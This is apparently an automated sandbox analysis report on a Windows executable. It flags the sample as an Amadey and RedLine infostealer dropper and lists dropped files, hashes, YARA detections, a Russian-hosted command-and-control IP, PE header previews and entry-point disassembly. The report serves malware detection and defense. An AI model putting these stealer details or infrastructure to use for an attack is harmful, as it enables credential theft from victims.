                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          02:32:34API Interceptor15x Sleep call for process: kxL91dA.exe modified
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          193.233.20.17LwExBhgzp5.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                            w1HEWorb6R.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                              sYIDRk0xB6.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                V34prXiUKp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                  j28TljQdlz.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                    7epTSsuohp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                      QhT58d7Wa8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                        001b09ececb8774d65d01bc2d0e8361072bae77ccaa7f.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                          R25yrPZVWB.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                            jb52PkNUda.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                              O3HGpnzpVR.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                73IPnhSw0f.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                  pjJw2RuL8g.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                    Gs3364OsSz.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                      kXCd4W2VY6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        d6wHjfEmem.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                          lMBbFLk6Up.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            X2dIcltgDn.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              8lP87m2wD6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                p3xSYI3ht2.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  REDCOM-ASRedcomKhabarovskRussiaRULwExBhgzp5.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  w1HEWorb6R.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  sYIDRk0xB6.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  V34prXiUKp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  j28TljQdlz.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  7epTSsuohp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  QhT58d7Wa8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  001b09ececb8774d65d01bc2d0e8361072bae77ccaa7f.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  guDO2HTB37.exeGet hashmaliciousAmadey, Fabookie, Glupteba, Nymaim, RedLine, SmokeLoader, VidarBrowse
                                                                                                                                                                                                  • 193.233.20.16
                                                                                                                                                                                                  R25yrPZVWB.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  Set-up.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                                  • 193.233.20.142
                                                                                                                                                                                                  jb52PkNUda.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  O3HGpnzpVR.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  73IPnhSw0f.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  pjJw2RuL8g.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  Gs3364OsSz.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  kXCd4W2VY6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  d6wHjfEmem.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  lMBbFLk6Up.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  X2dIcltgDn.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  • 193.233.20.17
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exeLwExBhgzp5.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                    sYIDRk0xB6.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      V34prXiUKp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                        j28TljQdlz.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                          7epTSsuohp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                            QhT58d7Wa8.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                              001b09ececb8774d65d01bc2d0e8361072bae77ccaa7f.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                R25yrPZVWB.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                  O3HGpnzpVR.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                    pjJw2RuL8g.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                      d6wHjfEmem.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                        7c5Krplc2I.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                          0TVZnvdn08.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                            i8ydwkcCFT.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                              J317T528yp.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                                LZAMwGq0MF.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                                  OhWUUCQuVV.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                                    70cff91e4937f0ff6d65807344652dc3141d1626bcfc7.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                                      l90N7uj8BJ.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                                        W0n2ZfP89x.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):226
                                                                                                                                                                                                                                          Entropy (8bit):5.354940450065058
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                                                          MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                                                          SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                                                          SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                                                          SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2843
                                                                                                                                                                                                                                          Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1HG1qL:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxo
                                                                                                                                                                                                                                          MD5:23C2D90E17CA7696A67D1409932B5A7C
                                                                                                                                                                                                                                          SHA1:016D0108FE25645BB4A643E978633C172DE8851A
                                                                                                                                                                                                                                          SHA-256:8578583C1EF6E115971E420D1576C548F8342D459FE2B99728AC9BDA4A8C852B
                                                                                                                                                                                                                                          SHA-512:9308C444DA9CC60756A8450C8BFE72F77CDD41F81B6023EFD2015C77F83035540173B49507D07AD33A137587867E7FA7A4EA1975C35255774C24D38B0C445A38
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\21fvBVFMsn.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):245248
                                                                                                                                                                                                                                          Entropy (8bit):6.363751855454997
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:U6f3mSV2p10caphMnboArJMuVyhpLT7oC2y8nU:UTb0caE0A2uVybLT7oChd
                                                                                                                                                                                                                                          MD5:0179181B2D4A5BB1346B67A4BE5EF57C
                                                                                                                                                                                                                                          SHA1:556750988B21379FD24E18B31E6CF14F36BF9E99
                                                                                                                                                                                                                                          SHA-256:0A763637206A70A3EC6707FE5728EA673AE3BC11EB5E059D962E99DCC3991F31
                                                                                                                                                                                                                                          SHA-512:1ADAAB4993EC3D1E32B9CC780AB17B5A6ACFE352789AAF2872E91BEF738DD5ACA3115071AC42A21C4FD19A82A522B515243EBEF340249115CFBE6951CB3C9CEE
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exe, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 72%
                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 69%, Browse
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: LwExBhgzp5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: sYIDRk0xB6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: V34prXiUKp.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: j28TljQdlz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 7epTSsuohp.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: QhT58d7Wa8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 001b09ececb8774d65d01bc2d0e8361072bae77ccaa7f.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: R25yrPZVWB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: O3HGpnzpVR.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: pjJw2RuL8g.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: d6wHjfEmem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 7c5Krplc2I.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 0TVZnvdn08.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: i8ydwkcCFT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: J317T528yp.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: LZAMwGq0MF.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: OhWUUCQuVV.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 70cff91e4937f0ff6d65807344652dc3141d1626bcfc7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: l90N7uj8BJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: W0n2ZfP89x.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z....D...D...D...E...D...EG..D...E...D2..E...D2..E...D2..E...D...E...D...DE..D|..E...D|..D...D|..E...DRich...D........PE..L...+..c.............................v............@.......................... ............@.................................H...d...............................h(...S..p....................T.......S..@............................................text............................... ..`.rdata..............................@..@.data...pG...........z..............@....rsrc...............................@..@.reloc..h(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\21fvBVFMsn.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):571904
                                                                                                                                                                                                                                          Entropy (8bit):7.826338389411454
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:yMr6y90++2JKNtPKEw3Lm/fy9N6aaEaUDZWoRwm2l3SB:UyxN8iaXYNl60f+tSB
                                                                                                                                                                                                                                          MD5:EE9CEC71CDD89A723F90D5013E963B02
                                                                                                                                                                                                                                          SHA1:43894D2D70B751A2F54E58AF8124DCE57FF7B5CD
                                                                                                                                                                                                                                          SHA-256:214DB2BB6E847D0A783D2973B83150D3805CC2144342A41DFEDE3B90B4187853
                                                                                                                                                                                                                                          SHA-512:AC27FC72516D0ADD01F1FE18AD593B0003D661949ADE7889A45A9DD23EC31B4D10CA59F551B967A9291C7B70EA9C5F4BB1521509366201A1E0BCB3867025B067
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 55%, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...R......`j............@.......................................@...... .......................................2..............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....@.......4...|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):357376
                                                                                                                                                                                                                                          Entropy (8bit):7.319017097214291
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:4FyoLGl224CQudunpkF+syy4rl1dGSraZ6D47/2pCbsYoqu:4woCl223QudunpM+JlaEaUD29sR
                                                                                                                                                                                                                                          MD5:8A8E17457F2ADB572257270B521CD527
                                                                                                                                                                                                                                          SHA1:2B8BD22C7220ACF82A5DAE2428EB1CBADA13C119
                                                                                                                                                                                                                                          SHA-256:8A92F1C6D8A530BAEC6BADB2C91636C1DE336B2AFB54EA9E6FB718D53A452F5F
                                                                                                                                                                                                                                          SHA-512:1035EC0CE7EFD17256CDF6513BD5CCE269C900F668290D3077C203FE10CCDD2C6193CCD32DE0138A80C1F64B8EC9A2F044C536BAB5DE00567D0E45D91F9B4C88
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 41%, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".X.f.6.f.6.f.6.x..}.6.x....6.x..N.6.AuM.o.6.f.7...6.x..g.6.x..g.6.x..g.6.Richf.6.........................PE..L...D..c.............................`.......0....@..........................0..................................................d........9...........................................................:..@............................................text............................... ..`.data...h....0......................@....rsrc....9.......:..................@..@.reloc..|).......*...J..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):206848
                                                                                                                                                                                                                                          Entropy (8bit):7.244182454113531
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:K1y+bnr+O1Q5GWp1icKAArDZz4N9GhbkrNEk6alaJRiHUKlYj:K1y+bnr+Pp0yN90QE8sJ0Uf
                                                                                                                                                                                                                                          MD5:EA0FADAB5F038CDB93F37EA867C62934
                                                                                                                                                                                                                                          SHA1:9BB0D6C6B3D769F1CA784BE50CA1EE9A033E5055
                                                                                                                                                                                                                                          SHA-256:0AECA2DB604D99082880C8DA7903A91874195936BF859496DD44C31324FDF8EA
                                                                                                                                                                                                                                          SHA-512:1DD60138E438D074DBDE94CF3BC3102C18ADD7DA44D6A57C7B933D0DDE11FEA2B9EFB09A73515A7B31499E4142A4F3328D79461A4659080F5B7AA0E6725ADD10
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................f.....@...... ..........................................................p..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                                                                                          Entropy (8bit):4.97029807367379
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                                                          MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                          SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                                                                                                                                                                                          SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                                                                                                                                                                                          SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):179200
                                                                                                                                                                                                                                          Entropy (8bit):4.949585044867417
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:cxqZWJBaKULo3HieYaez5F0h4/xNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuwk:yqZIHi5t0h
                                                                                                                                                                                                                                          MD5:C9C03EC2426C8416841FD7E93BB9DC3D
                                                                                                                                                                                                                                          SHA1:FD9430CC92842D29F76A7B3169EEE466F67273DB
                                                                                                                                                                                                                                          SHA-256:35BF034217A7E519626A2E1F7D1627322EBB31F9FA8E839EAFDF7AE2CDE977BE
                                                                                                                                                                                                                                          SHA-512:75D4A52CF4DCF4F43B3537344588393FBB96F9ED0173FF2981A497BD359FFBA9B7FED2BA7EB2FF04341D7FA2969CC2068EDEE009DF6E8292938E408BE41D7E5A
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Author: ditekSHen
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&_@...............0.................. ........@.. ....................... ............@.................................8...O.......$............................................................................ ............... ..H............text....... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.886498186028406
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:21fvBVFMsn.exe
                                                                                                                                                                                                                                          File size:764928
                                                                                                                                                                                                                                          MD5:478e1c903cfcda85acdb9759ae80e155
                                                                                                                                                                                                                                          SHA1:dc03499087dfa49b93fd9ba4b1452d0af8baef46
                                                                                                                                                                                                                                          SHA256:fd0f2580ee525c2fbde7b187b7b385a56e1817a219da7f3c398992a2c784a7d1
                                                                                                                                                                                                                                          SHA512:b3fd0e4810d987dcb232afa0d6c45a6dbc6bedc01538af0127f4f56d73a9da735870e29953c72efac74b08fc642702661427c3989bbd8de4b374190ba2affdab
                                                                                                                                                                                                                                          SSDEEP:12288:6MrMy90EI++bhYm1rUuQ/PKIwjcm/RySNvahEaUDZvoRFm2lR4B9pbap5RUGn:WyHIH1PrUBshJHNid0ufH4B2hPn
                                                                                                                                                                                                                                          TLSH:29F4124BE7CC8035F8F1177058F602D30A36BE615B788396274E6E5D5873AA0E27276B
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                                                                                                                                                                                          Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                                                          Entrypoint:0x406a60
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:10
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:10
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:10
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          call 00007F47BCC77745h
                                                                                                                                                                                                                                          jmp 00007F47BCC77055h
                                                                                                                                                                                                                                          push 00000058h
                                                                                                                                                                                                                                          push 004072B8h
                                                                                                                                                                                                                                          call 00007F47BCC777E7h
                                                                                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                                                                                          mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                          lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                          call dword ptr [0040A184h]
                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                          mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                          mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                                                          mov edi, ebx
                                                                                                                                                                                                                                          mov edx, 004088ACh
                                                                                                                                                                                                                                          mov ecx, esi
                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                          lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          je 00007F47BCC7706Ah
                                                                                                                                                                                                                                          cmp eax, esi
                                                                                                                                                                                                                                          jne 00007F47BCC77059h
                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                          inc esi
